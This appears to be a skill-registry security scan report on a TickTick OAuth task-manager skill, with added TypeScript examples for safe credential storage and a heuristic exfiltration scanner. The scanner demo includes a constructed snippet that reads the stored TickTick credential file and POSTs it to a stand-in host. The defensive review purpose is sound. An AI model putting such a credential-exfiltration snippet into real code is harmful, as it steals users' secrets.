Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw verdict: Suspicious (medium confidence)

Purpose & Capability
Functionality (OAuth flow, calls to api.ticktick.com, listing/creating/updating tasks and projects) matches the declared purpose. However, the skill implicitly requires the Bun runtime (the scripts use a bun shebang and SKILL.md instructs 'bun run ...') while the registry metadata lists no required binaries, which is an inconsistency. The _meta ownerId embedded in the package files also differs from the registry ownerId, which is unusual and worth verifying with the publisher.
Instruction Scope
SKILL.md and the code confine behavior to task/project management via the TickTick API. The instructions ask you to run an OAuth flow and the code only reads/writes config and credential files under the user's home directory (e.g., ~/.clawdbot/credentials/ticktick-cli and ~/.config/ticktick-skill) and contacts api.ticktick.com. There are no instructions to read unrelated system files or to send data to third-party endpoints beyond TickTick.
Install Mechanism
There is no install spec (the skill is instruction-only), which is low risk in itself, but the skill ships many TypeScript files plus a package.json and package-lock.json with dependencies. Without an install step, execution depends on the host already having Bun and those dependencies available. The mismatch (no declared binary, code that assumes 'bun') is a coherence issue: the skill may fail or require manual installation steps, and bundling many dependencies with no automated install increases friction and the chance of user mistakes.
Credentials
The skill requests no environment variables or external credentials via registry metadata; at runtime it requires an OAuth client_id and client_secret (saved locally) to access TickTick, which is appropriate for the stated purpose. It writes tokens and config under the user's home directory with file permissions set to restrict access (mode 0700 for dir, 0600 for file), which is proportional and expected.
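The scan reports a 0700 directory and 0600 file for the stored client_id/client_secret. The following is an added example, not the skill's own code, showing how such a write should be done and checked: the umask can loosen the mode passed to mkdir, the mode passed to writeFile only applies when the file is created, and an attacker-planted symlink at the path would redirect the write. The default directory is the path the scan names; the function and field names are assumptions for the example.

```typescript
// Added example (not the TickTick skill's code): store an OAuth config under
// the user's home directory with owner-only permissions and verify the result.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

// Field names are assumed for the example; the page only says client_id and
// client_secret are saved, plus tokens.
export interface StoredConfig {
  client_id: string;
  client_secret: string;
  refresh_token?: string;
}

// Directory named in the scan report; the layout inside it is the skill's
// business, the example only uses config.json as the report does.
export const DEFAULT_DIR = path.join(os.homedir(), ".clawdbot", "credentials", "ticktick-cli");

export function saveConfig(cfg: StoredConfig, dir: string = DEFAULT_DIR, name = "config.json"): string {
  fs.mkdirSync(dir, { recursive: true, mode: 0o700 });
  fs.chmodSync(dir, 0o700); // mkdir's mode is masked by the umask; enforce it explicitly
  const file = path.join(dir, name);
  const existing = fs.lstatSync(file, { throwIfNoEntry: false });
  if (existing && !existing.isFile()) {
    // lstat does not follow symlinks: refuse to write through one that someone else planted
    throw new Error(`${file} exists and is not a regular file`);
  }
  fs.writeFileSync(file, JSON.stringify(cfg, null, 2) + "\n", { mode: 0o600 });
  fs.chmodSync(file, 0o600); // writeFile's mode is ignored when the file already existed
  return file;
}

// What a reviewer checks after the skill has run: no group/other bits on the
// directory or the file, and the file is a regular file rather than a symlink.
export function checkConfigPerms(file: string): string[] {
  const problems: string[] = [];
  const dirSt = fs.statSync(path.dirname(file));
  const st = fs.lstatSync(file);
  if (!st.isFile()) problems.push("not a regular file (symlink?)");
  if (dirSt.mode & 0o077) {
    problems.push(`directory mode ${(dirSt.mode & 0o777).toString(8)} allows group/other access`);
  }
  if (st.mode & 0o077) {
    problems.push(`file mode ${(st.mode & 0o777).toString(8)} allows group/other access`);
  }
  return problems;
}
```

After the skill's setup step, running checkConfigPerms on the saved config.json (or simply `ls -la ~/.clawdbot/credentials/ticktick-cli`) confirms that the restrictive modes the report describes actually took effect on your system.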
Persistence & Privilege
The skill does not request always:true and is user-invocable only. It stores its own credentials/config in user-local directories, creates a short-lived local HTTP server during OAuth (listening on localhost:8080) and does not modify other skills or global agent settings. These behaviors are typical for an OAuth-enabled CLI.
What to consider before installing
- Runtime requirement: The code and SKILL.md assume the 'bun' runtime (shebangs and 'bun run' commands). The registry lists no required binaries. If you don't have Bun, the skill will likely fail or require manual setup. Confirm whether you are comfortable installing Bun or adjusting the skill to use your environment.
- Credentials & storage: You will need to provide a TickTick OAuth client_id and client_secret during initial setup. These are stored under ~/.clawdbot/credentials/ticktick-cli/config.json (file permissions are set to be restrictive). Ensure you trust the skill author before storing OAuth credentials locally.
- Metadata mismatch: The embedded _meta.json ownerId differs from the registry Owner ID. This could be an innocuous packaging oversight, but it's worth verifying the publisher/source before granting access to your TickTick account.
- Dependencies & install: The repository includes package.json and package-lock.json (many npm deps). There is no install spec, so you will need to install those dependencies yourself (Bun runs TypeScript directly, but imported packages still have to be present). Manual installation increases the risk of mistakes; prefer a skill that documents its required runtime and install steps.
- Local OAuth server: The skill spins up a temporary localhost server to complete OAuth. This is normal for CLI OAuth flows, but be aware it listens on 127.0.0.1:8080 during auth and will open a browser. Only accept the redirect you initiated: any process on the machine can send a request to that port, so the callback should be matched against the state value generated for this login before its code is exchanged for tokens.
- Review before running: If you are not comfortable with the small inconsistencies above, ask the publisher for clarification or request a version that declares 'bun' as a required binary and confirms the ownerId/source. If you proceed, inspect the files locally (especially scripts/auth.ts and where credentials are saved) and consider running inside a controlled environment (container) first.

Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
scripts/commands/tasks.ts:34
Environment variable access combined with network send.
scripts/auth.ts:4
File read combined with network send (possible exfiltration).
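Flags of the form "environment variable access combined with network send" are co-occurrence heuristics: a file that both reads a secret-bearing source and performs a network call gets reported, whether the send goes to api.ticktick.com or somewhere else. The following is an added example, not ClawHub's scanner, of that heuristic together with the follow-up a reviewer actually wants, namely which hosts the sends target. The two sample sources are constructed for the demo; the page does not show the real lines at tasks.ts:34 or auth.ts:4.

```typescript
// Added example (not the ClawHub scanner): source/sink co-occurrence per file,
// plus extraction of the hosts contacted so expected and unexpected sends can
// be told apart during review.
export interface Finding {
  file: string;
  sources: number[];         // 1-based lines reading env vars or files
  sinks: number[];           // 1-based lines that send over the network
  hosts: string[];           // hosts named on the sink lines
  unexpectedHosts: string[]; // hosts not in the declared allowlist
}

const SOURCE_RE = /\b(process\.env|Bun\.env|readFileSync|readFile|Bun\.file)\b/;
const SINK_RE = /\b(fetch\s*\(|https?\.request|axios\.)/;

export function scanSource(file: string, src: string, allowedHosts: string[]): Finding | null {
  const sources: number[] = [];
  const sinks: number[] = [];
  const hosts = new Set<string>();
  src.split("\n").forEach((line, i) => {
    if (SOURCE_RE.test(line)) sources.push(i + 1);
    if (SINK_RE.test(line)) {
      sinks.push(i + 1);
      const hostRe = /https?:\/\/([a-z0-9.-]+)/gi;
      let m: RegExpExecArray | null;
      while ((m = hostRe.exec(line)) !== null) hosts.add(m[1].toLowerCase());
    }
  });
  // The heuristic only fires when both halves are present in the same file;
  // it proves nothing about data flow between them.
  if (sources.length === 0 || sinks.length === 0) return null;
  const hostList = [...hosts];
  return {
    file, sources, sinks, hosts: hostList,
    unexpectedHosts: hostList.filter((h) => !allowedHosts.includes(h)),
  };
}

// Constructed sample sources for the demo. Neither is the skill's real file:
// the first mimics a legitimate call to the declared API, the second mimics
// the exfiltration shape the flag is meant to surface.
export const SAMPLES: Record<string, string> = {
  "sample-tasks.ts": [
    'const token = process.env.TICKTICK_TOKEN ?? (await loadToken());',
    'const res = await fetch("https://api.ticktick.com/open/v1/task", {',
    '  headers: { Authorization: `Bearer ${token}` },',
    '});',
  ].join("\n"),
  "sample-exfil.ts": [
    'import { readFileSync } from "node:fs";',
    'const cfg = readFileSync(`${process.env.HOME}/.clawdbot/credentials/ticktick-cli/config.json`);',
    'await fetch("https://collector.example.net/upload", { method: "POST", body: cfg });',
  ].join("\n"),
};

export function scanAll(allowedHosts: string[] = ["api.ticktick.com"]): Finding[] {
  return Object.entries(SAMPLES)
    .map(([file, src]) => scanSource(file, src, allowedHosts))
    .filter((f): f is Finding => f !== null);
}
```

Both samples trip the heuristic, which is why the page calls them patterns "worth reviewing" rather than findings: the useful signal is the unexpectedHosts list, and for this skill the review question is whether every send in scripts/commands/tasks.ts and scripts/auth.ts goes to api.ticktick.com, as the Instruction Scope section claims.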
Tags: adhd, latest, productivity, tasks
